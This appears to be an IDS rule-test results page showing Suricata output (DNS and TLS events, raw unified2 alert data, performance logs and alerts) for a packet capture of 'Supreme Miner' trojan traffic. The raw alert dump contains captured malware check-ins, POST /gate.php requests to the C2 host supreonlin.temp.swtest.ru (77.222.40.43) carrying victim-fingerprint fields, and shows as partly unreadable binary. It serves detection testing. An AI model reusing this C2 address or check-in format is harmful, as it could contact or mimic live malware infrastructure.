{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"j.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"g.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"l.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"d.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"e.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"m.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:50:08.077884+0000","flow_id":1653257758847036,"pcap_cnt":13,"event_type":"dns","src_ip":"192.168.95.10","src_port":56588,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60423,"rrname":"bitbucket.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.3"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.1"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"bitbucket.org","rrtype":"A","ttl":52,"rdata":"104.192.143.2"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"b2.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"c0.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"d0.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"b0.org.afilias-nst.org"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"a2.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.113264+0000","flow_id":1653257758847036,"pcap_cnt":14,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":56588,"proto":"UDP","dns":{"type":"answer","id":60423,"rcode":"NOERROR","rrname":"org","rrtype":"NS","ttl":31085,"rdata":"a0.org.afilias-nst.info"}}
{"timestamp":"2018-07-02T11:50:08.781835+0000","flow_id":1556605962335948,"pcap_cnt":23,"event_type":"tls","src_ip":"192.168.95.10","src_port":49159,"dest_ip":"104.192.143.3","dest_port":443,"proto":"TCP","tls":{"subject":"unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org","issuerdn":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA"}}
{"timestamp":"2018-07-02T11:50:21.734482+0000","flow_id":1461133135131922,"pcap_cnt":390,"event_type":"dns","src_ip":"192.168.95.10","src_port":57909,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26940,"rrname":"supreonlin.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"supreonlin.temp.swtest.ru","rrtype":"A","ttl":599,"rdata":"77.222.40.43"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"a.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"d.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"e.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"f.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:21.980732+0000","flow_id":1461133135131922,"pcap_cnt":391,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":57909,"proto":"UDP","dns":{"type":"answer","id":26940,"rcode":"NOERROR","rrname":"ru","rrtype":"NS","ttl":26359,"rdata":"b.dns.ripn.net"}}
{"timestamp":"2018-07-02T11:50:22.444555+0000","flow_id":512976154970251,"pcap_cnt":399,"event_type":"dn

This file has been truncated. Go here to download in full.


unified2.alert.1530803408 - (3126 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
4[:~´’PÀ¨_
MÞ(+ÀPG[:~[:~´’+E$ À¨_
MÞ(+ÀPP~id=FC05C743&ip=C%3a%5cProgramData%5c%7b5b6b56-24c1bb-55e1-72f2382933a9%7d%5chostdl.exe&os=Windows+7&av=FC05C743&cn=PC-4A095E27CB&cpu=Intel(R)+Core(TM)2+Duo+CPU+++++T7700++%40+2.40GHz&gpu=Standard+VGA+Graphics+Adapter&pv=Admin&bv=v1.1.0&enabled=04[:ɌPÀ¨_
MÞ(+ÀPq[:[:ɌUEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:„ÚºPÀ¨_
MÞ(+ÀPq[:„[:„ÚºUEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:Š©¥PÀ¨_
MÞ(+ÀPq[:Š[:Š©¥UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:÷¢PÀ¨_
MÞ(+ÀPq[:[:÷¢UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:”±PÀ¨_
MÞ(+ÀPq[:”[:”±UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:šá—PÀ¨_
MÞ(+ÀPq[:š[:šá—UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:Ÿè…PÀ¨_
MÞ(+ÀPq[:Ÿ[:Ÿè…UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04	[:¥·«PÀ¨_
MÞ(+ÀPq	[:¥[:¥·«UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04
[:ª
‹1PÀ¨_
MÞ(+ÀPq
[:ª[:ª
‹1UEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:°rcPÀ¨_
MÞ(+ÀPé[:°[:°rcÍE¿$~À¨_
MÞ(+ÀPPnrPOST /gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: supreonlin.temp.swtest.ru
Content-Length: 31
Expect: 100-continue

[:°[:°rcìEÞ$_À¨_
MÞ(+ÀPPÏPOST /gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: supreonlin.temp.swtest.ru
Content-Length: 31
Expect: 100-continue

id=FC05C743&enabled=1&bv=v1.1.04[:¶MPÀ¨_
MÞ(+ÀPq[:¶[:¶MUEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04
[:¼
|œPÀ¨_
MÞ(+ÀPq
[:¼[:¼
|œUEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.04[:¬RÐPÀ¨_
MÞ(+ÀPc[:¬[:¬RÐGEG$öÀ¨_
MÞ(+ÀPPÕUid=FC05C743&enabled=1&bv=v1.1.0


suricata-4.0.0-test-test-perf.txt-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt - (725 bytes) - download
1
2
3
4
5
6
7
  --------------------------------------------------------------------------
  Date: 7/5/2018 -- 15:10:10. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        1003547      1        1        119679       11.86  1        1        119679      119679.00   119679.00   0.00       
  2        1003548      1        1        889835       88.14  14       13       104595      63559.64    65882.92    33357.00   


keyword_perf.log - (4369 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 7/5/2018 -- 15:10:10
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             51176           15              15              4653            3411.00         3411.00         0.00           
  content          313040          90              89              8643            3478.00         3487.00         2670.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             51176           15              15              4653            3411.00         3411.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          45994           14              14              3990            3285.00         3285.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          172965          48              47              8643            3603.00         3623.00         2670.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          51022           14              14              4876            3644.00         3644.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          43059           14              14              3768            3075.00         3075.00         0.00           


IDSDeathBlossom.py.log - (1242 bytes) - download
1
2
3
4
5
6
7
8
9
2018-07-05 15:10:07,082 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-07-05 15:10:08,296 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-07-05 15:10:08,296 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-test-test
2018-07-05 15:10:08,304 - INFO - generate_config - /opt/IDSDeathBlossom/IDSDeathBlossom.py +162 - Loading glob result: ['/tmp/tmpnRSXzF']
2018-07-05 15:10:08,304 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-07-05 15:10:08,304 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-07-05 15:10:08,305 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /tmp/IXUyPT -l /var/www/html/1c95dcebfd89d44f61031e49a8818557140b85e9e9124dd03a3071940a2c06d1 -r /var/pcap/07052018.1510-merged.pcap -vvv -k none
2018-07-05 15:10:10,030 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-07-05 15:10:10,031 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 2.96215701103


suricata-4.0.0-test-test-alert-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt - (2884 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
07/02/2018-11:50:22.767122  [**] [1:1003547:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:23.379276  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:28.776890  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:34.174501  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:39.587682  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:44.985265  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:50.385431  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:50:55.780421  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:01.178091  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:06.887601  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:12.488035  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:18.478476  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-11:51:24.687260  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80
07/02/2018-12:21:00.545488  [**] [1:1003548:1] ETPRO TROJAN MSIL/Supreme Miner CnC Checkin M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.95.10:49160 -> 77.222.40.43:80